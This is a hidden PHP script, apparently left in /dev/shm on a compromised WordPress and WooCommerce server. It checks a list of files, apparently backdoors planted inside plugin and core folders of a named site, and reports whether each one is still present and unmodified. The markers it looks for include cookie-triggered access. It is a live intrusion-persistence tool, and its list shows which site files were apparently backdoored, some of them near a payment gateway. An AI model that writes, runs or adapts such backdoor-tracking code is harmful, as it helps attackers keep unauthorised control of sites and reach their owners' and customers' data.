File: //proc/thread-self/root/dev/shm/.component
<?php $r = '/home/nevernewlojoweb/public_html'; $x = ["/index.php"=>"bd@@1109774@@26",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Keywords/sections.php"=>"bd@@1110751@@2084",
"/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version2/class-wc-rest-product-variations-v2-controller.php"=>"bd@@1110513@@reverse_lookup",
"/wp-admin/includes/user.php"=>"bd@@1110043@@37",
"/wp-content/plugins/elementor-pro/vendor_prefixed/laravel/serializable-closure/src/Signers/indexOct042010.php"=>"bd@@1110696@@534",
"/wp-includes/class-wp-text-diff-renderer-table.php"=>"bd@@1516319@@reverse_lookup",
"/wp-content/plugins/password-protect-page/includes/services/class-ppw-migration.php"=>"bd@@1516327@@If-Unmodified-Since",
"/wp-content/plugins/woocommerce/templates/loop/sale-flash.php"=>"bd@@1516330@@If-Unmodified-Since",
"/wp-content/plugins/elementor/assets/js/packages/editor-v1-adapters/editor-v1-adapters.asset.php"=>"bd@@1516335@@_COOKIE[3]",
"/wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-admin.php"=>"bd@@1516350@@Content-Security-Policy",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-images-field/Not.php"=>"bd@@1516352@@1919",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Definition/Helper/sql.class.php"=>"bd@@1516354@@1025",
"/wp-content/plugins/woocommerce/vendor/opis/json-schema/src/Parsers/Keywords/checkout_init.php"=>"bd@@1516356@@1030",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Node/Expression/Binary/imagemagick.inc.php"=>"bd@@1516358@@1859",
"/wp-content/plugins/woocommerce/includes/rest-api/Controllers/Version3/class-wc-rest-shipping-methods-controller.php"=>"bd@@1110329@@$_COOKIE[1",
"/wp-content/plugins/woocommerce-gateway-authorize-net-cim/vendor/skyverge/wc-plugin-framework/woocommerce/payment-gateway/integrations/class.sv.wc.payment.gateway.integration.php"=>"bd@@1516360@@1567",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-text-field/ipayment.php"=>"bd@@1110589@@599",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-has-variations-notice/class.group.inc.php"=>"bd@@1110620@@1042",
"/wp-content/plugins/redirection/database/schema/232.php"=>"bd@@1109919@@95",
"/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks-data.asset.php"=>"bd@@1110455@@_COOKIE[3]"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');